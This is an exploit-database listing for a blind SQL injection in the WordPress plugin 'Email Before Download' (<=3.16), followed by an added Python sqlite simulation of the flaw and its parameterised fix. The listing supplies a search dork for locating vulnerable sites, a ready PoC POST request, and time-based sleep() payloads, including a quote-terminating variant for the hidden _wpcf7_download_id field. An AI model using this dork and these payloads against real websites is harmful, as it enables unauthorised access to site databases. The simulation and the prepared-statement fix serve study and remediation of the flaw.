Wordpress Plugin Email Before Download <=3.16 Blind SQL Injection

2012-04-13T00:00:00
ID 1337DAY-ID-18049
Type zdt
Reporter localh0t
Modified 2012-04-13T00:00:00

Description

Exploit for php platform in category web applications

# Wordpress Plugin: Email Before Download <=3.16 Remote Blind SQL Injection
# Dork: allinurl: plugins/email-before-download
# Download: https://wordpress.org/extend/plugins/email-before-download/
# Date: 13/04/12
# Contact: [email protected]
# Follow: @mattdch
# www.localh0t.com.ar
 

The variable $download_id is interpolated into an SQL query without being escaped (for example with $wpdb->escape()) or bound through $wpdb->prepare().

On line 120 (File: /email-before-download/email-before-download.php) we can see that:
=====================================================================================

	120: $ebd_item = $wpdb->get_row( "SELECT * FROM $table_item  WHERE download_id = '$download_id' " );

In the generated HTML we can see that $download_id is round-tripped through a hidden form field named "_wpcf7_download_id", so on submission the plugin takes it straight from the $_POST value of that field:

 	201: $hf .= '<input type="hidden" name="_wpcf7_download_id" value="' . $download_id. '" /></form>';

PoC:
====

	POST http://website.com/?tag=some-post-with-contact-form

	Data:
	=====
	_wpcf7=135&_wpcf7_download_id=6 [SQL HERE]&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&[email protected]&your-enterprise=1&your-name=test
	
		Example:
		========
		_wpcf7=135&_wpcf7_download_id=6 and sleep(10)&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&[email protected]&your-enterprise=1&your-name=test

(POST variable names may vary.)

Check: the injection is blind, so confirm it by response time. If the request with "6 and sleep(10)" takes about 10 seconds longer than one with "6", the sleep() executed. Note that line 120 wraps the value in single quotes, so the bare payload above lands inside a string literal; if it does not delay the response, try a quote-terminating variant such as 6' and sleep(10) and '1'='1 so that the condition is evaluated as SQL.
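Added example, not part of the advisory or of the plugin's code: a small Python simulation of the query at line 120 (string interpolation inside single quotes) next to a parameterised version, run against an in-memory sqlite database in place of MySQL. The table name, rows and the registered sleep() function are constructed for the demo; sqlite has no SLEEP(), so a Python callable is registered under that name to show whether the injected sleep actually ran and to keep the delay short. It shows that the bare payload from the PoC stays inside the quoted literal, that a quote-terminating payload reaches sleep(), and that the prepared query neutralises both.

```python
import sqlite3
import time

BARE_PAYLOAD = "6 and sleep(10)"              # payload as given in the PoC
QUOTED_PAYLOAD = "6' AND sleep(10) AND '1'='1"  # closes the single quote first


def make_db():
    """Constructed stand-in for the plugin's item table (not the real wp_* schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ebd_item (id INTEGER PRIMARY KEY, download_id INTEGER, file TEXT)"
    )
    conn.executemany(
        "INSERT INTO ebd_item (download_id, file) VALUES (?, ?)",
        [(6, "brochure.pdf"), (7, "datasheet.pdf")],
    )
    return conn


class SleepProbe:
    """Registered as the SQL function sleep(n): counts calls and sleeps briefly,
    so the test can tell whether the injected sleep executed without waiting 10 s."""

    def __init__(self, delay=0.05):
        self.calls = 0
        self.delay = delay

    def __call__(self, n):
        self.calls += 1
        time.sleep(self.delay)
        return 0  # MySQL's SLEEP() also returns 0 on normal completion


def vulnerable_lookup(conn, download_id):
    # Mirrors line 120 of the plugin: the value is dropped into the SQL text,
    # inside single quotes, with no escaping or binding.
    sql = f"SELECT * FROM ebd_item WHERE download_id = '{download_id}'"
    return conn.execute(sql).fetchone()


def prepared_lookup(conn, download_id):
    # The fix: bind the value as a parameter. In WordPress the equivalent is
    # $wpdb->prepare("SELECT * FROM $table_item WHERE download_id = %d", $download_id).
    return conn.execute(
        "SELECT * FROM ebd_item WHERE download_id = ?", (download_id,)
    ).fetchone()


def probe(lookup, payload):
    """Run one lookup with the given payload and report whether sleep() executed."""
    conn = make_db()
    sleeper = SleepProbe()
    conn.create_function("sleep", 1, sleeper)
    start = time.monotonic()
    try:
        row = lookup(conn, payload)
    except sqlite3.Error:
        row = None  # a syntax error from a malformed payload is not a delay
    elapsed = time.monotonic() - start
    return {
        "sleep_calls": sleeper.calls,
        "delayed": elapsed >= sleeper.delay * 0.9,
        "row": row,
    }


if __name__ == "__main__":
    for name, lookup in (("vulnerable", vulnerable_lookup), ("prepared", prepared_lookup)):
        for payload in (BARE_PAYLOAD, QUOTED_PAYLOAD):
            print(name, repr(payload), probe(lookup, payload))
```

With the vulnerable query the bare payload is compared as the string '6 and sleep(10)' and sleep() is never called; the quote-terminating payload reaches sleep() and delays the response, which is the signal a time-based blind injection relies on. The prepared query never lets either payload into the SQL text.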



#  0day.today [2018-03-28]  #